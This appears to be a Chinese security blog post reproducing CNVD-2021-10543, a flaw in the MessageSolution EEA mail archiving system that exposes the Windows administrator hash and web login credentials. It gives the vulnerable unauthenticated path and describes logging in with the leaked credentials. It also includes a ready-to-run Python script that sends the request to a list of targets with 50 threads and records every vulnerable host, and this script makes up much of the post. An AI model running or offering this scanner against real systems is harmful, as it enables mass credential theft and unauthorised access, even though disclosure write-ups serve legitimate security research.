MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543复现

259 阅读1分钟

图片

MessageSolution 邮件归档系统EEA 信息泄露漏洞 

CNVD-2021-10543复现

一、简介

MessageSolution企业邮件归档管理系统 EEA是北京易讯思达科技开发有限公司开发的一款邮件归档系统。该系统存在通用WEB信息泄漏,泄露Windows服务器administrator hash与web账号密码

二、影响产品

MessageSolution 企业邮件归档管理系统EEA

三、漏洞复现

访问页面:

图片

存在漏洞poc路径:

http://127.0.0.1/authenticationserverservlet/

访问地址出现密码:

图片

图片

利用获取账户密码登陆系统:

图片

检测过程:

编写一个简单的检测脚本:

图片

脚本:

#!/usr/bin/enc python
# _*_ coding: utf-8 _*_

import requests
import os
import sys
import threading
from multiprocessing.dummy import Pool
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


file = str(sys.argv[1])
write = sys.argv[2]
readfile = open(file , 'r' , encoding='UTF-8')
writefile = open(write , 'a')
ff = readfile.readlines()

def webhttp():
    for line in ff:
        try:
            line = line.rstrip("\n")
            payload = "/authenticationserverservlet/"
            url = line + payload
            req = requests.get(url, verify=False, timeout=1)
            status = req.status_code
            print(req.text)
            if 'administrator' in req.text:
                print(url+" -------------存在漏洞-------------")
                writefile.write(url)
                writefile.write('\n')
            else :
                print(url+" 不存在漏洞")
                pass
        except OSError:
            pass

def main():
    #f = threading.Thread(target=webhttp)
    pool = Pool(50)
    f = pool.apply_async(func=webhttp)
    pool.close()
    pool.join()
    readfile.close()
    writefile.close()

if __name__=="__main__":
    main()

参考:

mp.weixin.qq.com/s/PQaOqCem2…

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

图片

个人知乎:www.zhihu.com/people/fu-w…

个人简书:www.jianshu.com/u/bf0e38a8d…

个人CSDN:blog.csdn.net/qq\_3760279…

个人博客园:www.cnblogs.com/thelostworl…

FREEBUF主页:www.freebuf.com/author/thel…

语雀博客主页:www.yuque.com/thelostworl…

图片